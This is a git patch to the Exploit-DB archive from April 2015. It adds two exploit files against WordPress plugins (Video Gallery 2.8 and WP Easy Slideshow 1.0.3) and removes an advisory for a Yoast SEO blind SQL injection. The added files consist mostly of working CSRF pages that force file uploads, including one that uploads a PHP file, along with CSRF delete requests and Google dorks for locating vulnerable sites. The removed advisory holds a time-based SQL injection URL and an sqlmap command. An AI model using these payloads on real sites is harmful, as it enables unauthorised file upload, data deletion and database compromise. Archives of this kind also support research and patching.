From f7fce69883ae06d4e851b124a8313c8bcea08dab Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 6 Apr 2015 08:36:30 +0000
Subject: [PATCH] DB: 2015-04-06

2 new exploits
---
 files.csv                       |  4 +-
 platforms/aix/dos/36413.txt     | 74 ------------------------------
 platforms/php/webapps/36610.txt | 61 +++++++++++++++++++++++++
 platforms/php/webapps/36612.txt | 81 +++++++++++++++++++++++++++++++++
 4 files changed, 145 insertions(+), 75 deletions(-)
 delete mode 100755 platforms/aix/dos/36413.txt
 create mode 100755 platforms/php/webapps/36610.txt
 create mode 100755 platforms/php/webapps/36612.txt

diff --git a/files.csv b/files.csv
index 2b187216e..b235e4d10 100755
--- a/files.csv
+++ b/files.csv
@@ -32833,7 +32833,7 @@ id,file,description,date,author,platform,type,port
 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
 36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download &  execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0
 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
-36413,platforms/aix/dos/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",aix,dos,0
+36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0
 36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
 36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
@@ -33021,6 +33021,8 @@ id,file,description,date,author,platform,type,port
 36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
 36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80
+36610,platforms/php/webapps/36610.txt,"Wordpress Video Gallery Plugin 2.8 - Multiple CSRF Vulnerabilities",2015-04-02,Divya,php,webapps,80
+36612,platforms/php/webapps/36612.txt,"Wordpress WP Easy Slideshow Plugin 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80
 36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injection",2015-04-02,"ITAS Team",php,webapps,80
 36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80
 36615,platforms/php/webapps/36615.txt,"Wordpress Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80
diff --git a/platforms/aix/dos/36413.txt b/platforms/aix/dos/36413.txt
deleted file mode 100755
index c694dbdf3..000000000
--- a/platforms/aix/dos/36413.txt
+++ /dev/null
@@ -1,74 +0,0 @@
-Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection
-Version/s Tested: 1.7.3.3
-Patched Version: 1.7.4
-CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
-CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
-WPVULNDB: https://wpvulndb.com/vulnerabilities/7841
-
-Description:
-
-WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used
-to improve the Search Engine Optimization (SEO) of WordPress sites. The
-latest version at the time of writing (1.7.3.3) has been found to be
-affected by two authenticated (admin, editor or author user) Blind SQL
-Injection vulnerabilities. The plugin has more than one million downloads
-according to WordPress.
-
-Technical Description:
-
-The authenticated Blind SQL Injection vulnerability can be found within the
-'admin/class-bulk-editor-list-table.php' file. The orderby and order GET
-parameters are not sufficiently sanitised before being used within a SQL
-query.
-
-Line 529:
-
-$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field(
-$_GET['orderby'] ) ) : 'post_title';
-
-Line 533:
-
-order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );
-
-If the GET orderby parameter value is not empty it will pass its value
-through WordPess's own esc_sql() function. According to WordPress this
-function 'Prepares a string for use as an SQL query. A glorified
-addslashes() that works with arrays.'. However, this is not sufficient to
-prevent SQL Injection as can be seen from our Proof of Concept.
-
-Proof of Concept (PoC):
-
-The following GET request will cause the SQL query to execute and sleep for
-10 seconds if clicked on as an authenticated admin, editor or author user.
-
-http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
-
-Using SQLMap:
-
-python sqlmap.py -u "
-http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc"
---batch --technique=B --dbms=MySQL --cookie="wordpress_9d...;
-wordpress_logged_in_9dee67...;"
-
-Impact:
-
-As there is no anti-CSRF protection a remote unauthenticated attacker could
-use this vulnerability to execute arbitrary SQL queries on the victim
-WordPress web site by enticing an authenticated admin, editor or author
-user to click on a specially crafted link or visit a page they control.
-
-One possible attack scenario would be an attacker adding their own
-administrative user to the target WordPress site, allowing them to
-compromise the entire web site.
-
-Timeline:
-
-March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst
-(WPScan Team - Dewhurst Security).
-March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team).
-March 10th 2015 - 20:00 GMT: Vendor contacted via email.
-March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave
-expected patch timeline.
-March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches
-this issue.
-March 11th 2015 - 12:30 GMT: Advisory released.
\ No newline at end of file
diff --git a/platforms/php/webapps/36610.txt b/platforms/php/webapps/36610.txt
new file mode 100755
index 000000000..7ae0ca242
--- /dev/null
+++ b/platforms/php/webapps/36610.txt
@@ -0,0 +1,61 @@
+# Exploit Title: Wordpress Video Gallery Plugin Multiple CSRF File Upload
+# Google Dork: inurl:/wp-content/plugins/contus-video-gallery
+# Date: 31 March 2015
+# Exploit Author: Divya
+# Vendor Homepage: https://wordpress.org/plugins/contus-video-gallery/
+# Software Link: https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
+# Version: 2.8
+# Tested on: Windows, Linux
+# CVE : None
+
+CSRF File Upload Exploit Code:
+
+<html>
+<head>
+<title>
+WP Plugin CSRF File Upload
+</title>
+<body>
+	<script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------103932797413649");
+        xhr.withCredentials = true;
+        var body = "-----------------------------103932797413649\r\n" + 
+          "Content-Disposition: form-data; name=\"myfile\"; filename=\"test.mp4\"\r\n" + 
+          "Content-Type: video/mp4\r\n" + 
+          "\r\n" + 
+          "hello world how are you\r\n" + 
+          "-----------------------------103932797413649\r\n" + 
+          "Content-Disposition: form-data; name=\"mode\"\r\n" + 
+          "\r\n" + 
+          "video\r\n" + 
+          "-----------------------------103932797413649--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit" onclick="submitRequest();" />
+    </form>
+
+	
+  </body>
+</html>
+
+
+Other CSRF vulnerable areas of application:
+URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
+Data: myfile=[upload_file_details]&mode=video
+
+URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
+Data: myfile=[upload_file_details]&mode=image
+
+URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
+Data: myfile=[upload_file_details]&mode=srt
\ No newline at end of file
diff --git a/platforms/php/webapps/36612.txt b/platforms/php/webapps/36612.txt
new file mode 100755
index 000000000..04844db88
--- /dev/null
+++ b/platforms/php/webapps/36612.txt
@@ -0,0 +1,81 @@
+# Exploit Title: Wordpress WP Easy Slideshow Plugin Multiple Vulnerabilities
+# Google Dork: inurl:/wp-content/uploads/wp-easy-slideshow/
+# Date: 2 April 2015
+# Exploit Author: Divya
+# Vendor Homepage: https://wordpress.org/plugins/wp-easy-slideshow/
+# Software Link: https://downloads.wordpress.org/plugin/wp-easy-slideshow.zip
+# Version: 1.0.3
+# Tested on: Windows, Linux
+# CVE : None
+
+Delete operation using CSRF:
+
+<img src="http://192.168.1.2/wp-admin/admin.php?page=wss-images&del_id=[number]">
+Example: http://192.168.1.2/wp-admin/admin.php?page=wss-images&del_id=1
+
+<html>
+  <head><title>CSRF Delete Operation</title></head>
+  <body>
+    <form action="http://192.168.1.2/wp-admin/admin.php">
+      <input type="hidden" name="page" value="wss-images" />
+      <input type="hidden" name="del_id" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+Arbitrary File Upload using CSRF:
+
+<html>
+  <head><title>WP CSRF File Upload</title></head>
+  <body>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://localhost/wordpress/wp-admin/admin.php?page=wss-add-image", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1559691976562");
+        xhr.withCredentials = true;
+        var body = "-----------------------------1559691976562\r\n" + 
+          "Content-Disposition: form-data; name=\"wss_image\"; filename=\"myfile.php\"\r\n" + 
+          "Content-Type: application/octet-stream\r\n" + 
+          "\r\n" + 
+          "\x3c?php\r\n" + 
+          "phpinfo();\r\n" + 
+          "?\x3e\r\n" + 
+          "-----------------------------1559691976562\r\n" + 
+          "Content-Disposition: form-data; name=\"desc_content\"\r\n" + 
+          "\r\n" + 
+          "CSRF File Upload\r\n" + 
+          "-----------------------------1559691976562\r\n" + 
+          "Content-Disposition: form-data; name=\"image_link\"\r\n" + 
+          "\r\n" + 
+          "linkData\r\n" + 
+          "-----------------------------1559691976562\r\n" + 
+          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
+          "\r\n" + 
+          "Submit\r\n" + 
+          "-----------------------------1559691976562--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
+
+
+Arbitrary File Upload (Authenticated):
+
+URL: http://192.168.1.2/wp-admin/admin.php?page=wss-add-image
+
+The upload script allows uploading arbitrary files. The files are renamed to numbers like 1,2,3,... The uploaded files cannot be executed on server.
+
+Upload Location: http://192.168.1.2/wp-content/uploads/wp-easy-slideshow/